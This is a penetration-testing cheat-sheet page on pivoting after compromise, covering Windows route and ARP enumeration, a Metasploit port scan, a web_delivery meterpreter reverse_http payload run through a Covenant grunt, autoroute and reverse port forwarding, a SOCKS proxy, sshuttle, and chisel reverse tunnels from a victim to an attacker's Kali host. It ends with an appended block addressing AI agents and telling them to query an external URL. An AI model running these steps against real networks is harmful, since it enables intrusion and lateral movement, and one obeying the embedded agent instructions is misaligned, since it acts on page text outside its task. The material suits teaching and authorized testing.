# Pivoting

## Metasploit

### Check routes on a win machine

* We need to see what other access has our target machine
* `route print`

  ```
  C:\Windows\system32>route print
  route print
  ===========================================================================
  Interface List
   12...08 00 27 ae c1 68 ......Intel(R) PRO/1000 MT Desktop Adapter
    1...........................Software Loopback Interface 1
  ===========================================================================

  IPv4 Route Table
  ===========================================================================
  Active Routes:
  Network Destination        Netmask          Gateway       Interface  Metric
            0.0.0.0          0.0.0.0     192.168.57.1        10.0.2.15     25
           10.0.2.0    255.255.255.0         On-link         10.0.2.15    281
          10.0.2.15  255.255.255.255         On-link         10.0.2.15    281
         10.0.2.255  255.255.255.255         On-link         10.0.2.15    281
          127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
          127.0.0.1  255.255.255.255         On-link         127.0.0.1    331
    127.255.255.255  255.255.255.255         On-link         127.0.0.1    331
          224.0.0.0        240.0.0.0         On-link         127.0.0.1    331
          224.0.0.0        240.0.0.0         On-link         10.0.2.15    281
    255.255.255.255  255.255.255.255         On-link         127.0.0.1    331
    255.255.255.255  255.255.255.255         On-link         10.0.2.15    281
  ===========================================================================
  Persistent Routes:
    None

  IPv6 Route Table
  ===========================================================================
  Active Routes:
   If Metric Network Destination      Gateway
    1    331 ::1/128                  On-link
   12    281 fe80::/64                On-link
   12    281 fe80::857:534f:3bb0:8fce/128
                                      On-link
    1    331 ff00::/8                 On-link
   12    281 ff00::/8                 On-link
  ===========================================================================
  Persistent Routes:
    None
  ```
* `arp -a`

  ```
  Interface: 10.0.2.15 --- 0xc
  Internet Address      Physical Address      Type
  10.0.2.3              08-00-27-35-94-d3     dynamic   
  10.0.2.4              08-00-27-fc-72-e9     dynamic   
  10.0.2.5              08-00-27-7f-90-90     dynamic   
  10.0.2.8              08-00-27-1d-d2-98     dynamic   
  10.0.2.255            ff-ff-ff-ff-ff-ff     static    
  192.168.57.1          52-54-00-12-35-00     dynamic   
  224.0.0.22            01-00-5e-00-00-16     static    
  224.0.0.251           01-00-5e-00-00-fb     static    
  224.0.0.252           01-00-5e-00-00-fc     static    
  239.255.255.250       01-00-5e-7f-ff-fa     static    
  255.255.255.255       ff-ff-ff-ff-ff-ff     static    
  ```
* Now that we have other interesting IPs we can try to reach those new ones
* We can make a port scan on one of these IPs
* `use auxiliary/scanner/portscan/tcp`
* `set rhosts 10.0.2.5`
* `set ports 445`
* `run`

  ```
  [+] 10.0.2.5:             - 10.0.2.5:445 - TCP OPEN
  [*] 10.0.2.5:             - Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  ```

  We could of course have set more ports and this would be a cool nmap like tool.

## Reverse port forwarding and Session Passing with Metasploit having initial shell on Covenant

* We can assume that we have a shell with covenant for instance
* We generate a payload with metasploit through web delivery (more stealthy because it can pass as http traffic)
* `use exploit/multi/script/web_delivery`
* `set target 2` (for powershell)
* `set payload windows/x64/meterpreter/reverse_http`
* set lhost to your attacking machine
* sel an lport
* `exploit -j`
* Now we can copy the payload and paste to our grunt in Covenant
* Metasploit should now have opened a session
* We can choose an interface with `ipconfig`
* `run autoroute -s 192.168.16.0/24`
* We can check it's been done using `run autoroute -p`
* We can now set up a reverse port forward
* `portfwd add -R -p 1234 -l 443 -L ATTACKING-MACHINE-IP`
* We can check it's been done using `portfwd`
* we can background our session with CTRL-Z
* We will setup a socks proxy `use auxiliary/server/socks4a`
* We need to check our port in `/etc/proxychains4.conf`
* `set srvport 9050`
* we can check our jobs using `jobs`
* We can kill the web delivery one that we do not need anymore `jobs -k ID-OF-JOB`
* We now need to create a listener on covenant that will interact with the port forward set previously: `1 192.168.3.28:443 0.0.0.0:1234 Reverse`
* BindAddress can stay at 0.0.0.0, BindPort should be 443, connectPort should be 1234 and connect address is the ip of our victime machine.
* We should now be able to reach other machine in the network of the initial machine that has now route to our attacking machine using proxychains

## Shuttle

Let's say you got shell on a machine and this machine has access local to another (let's call it machine 2). Shuttle will allow you to access machine 2 from your network and act as a proxy.

```
sshuttle --listen 0.0.0.0 -e "ssh -i keyfile" -r user@IP-OF-YOUR-TARGET-MACHINE IP-OF-SUBNET-ACCESSIBLE-THROUGH-MACHINE2/24 -v
// example
sshuttle --listen 0.0.0.0 -e "ssh -i key" -r root@10.10.120.117 172.12.1.0/24 -v
```

## Chisel

* If you have a shell on a machine that has a local port open you can forward this port to your machine using chisel, it is called **port forwarding** for instance in our example we want to forward to listen the port 445 of the target machine that is open locally. You will then be able to intract from your kali on your port 445:

```
- On my kali `chisel server --reverse` (it is going to listen on port 8080)
- On the target `.\chisel.exe client KALI-IP:8080 R:445:127.0.0.1:445`
```

* You can check out examples of use of chisel on the [chatterbox writeup](/pentips/writeups/htbwriteups/htb-chatterbox.md) or [buffer overflow windows](/pentips/binary-exploitation/buffer-overflow-stack-win86.md)

### Pivoting with Chisel

* From my kali `chisel server --reverse`
* From the victim machine `.\chisel.exe client IP-OF-KALI:8080 R:1080:socks`
* In your `etc/proxychains4.conf` add this line `socks5 127.0.0.1 1080`

## Resources

{% embed url="<https://orangecyberdefense.com/fr/insights/blog/ethical_hacking/etat-de-lart-du-pivoting-reseau-en-2019/>" %}
Amazing Resource about pivoting but only in french, it could def be read using google translate
{% endembed %}

{% embed url="<https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course>" %}
TCM Security Academy - Practical Ethical Hacking - The Complete Course
{% endembed %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://csbygb.gitbook.io/pentips/post-exploitation/pivoting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.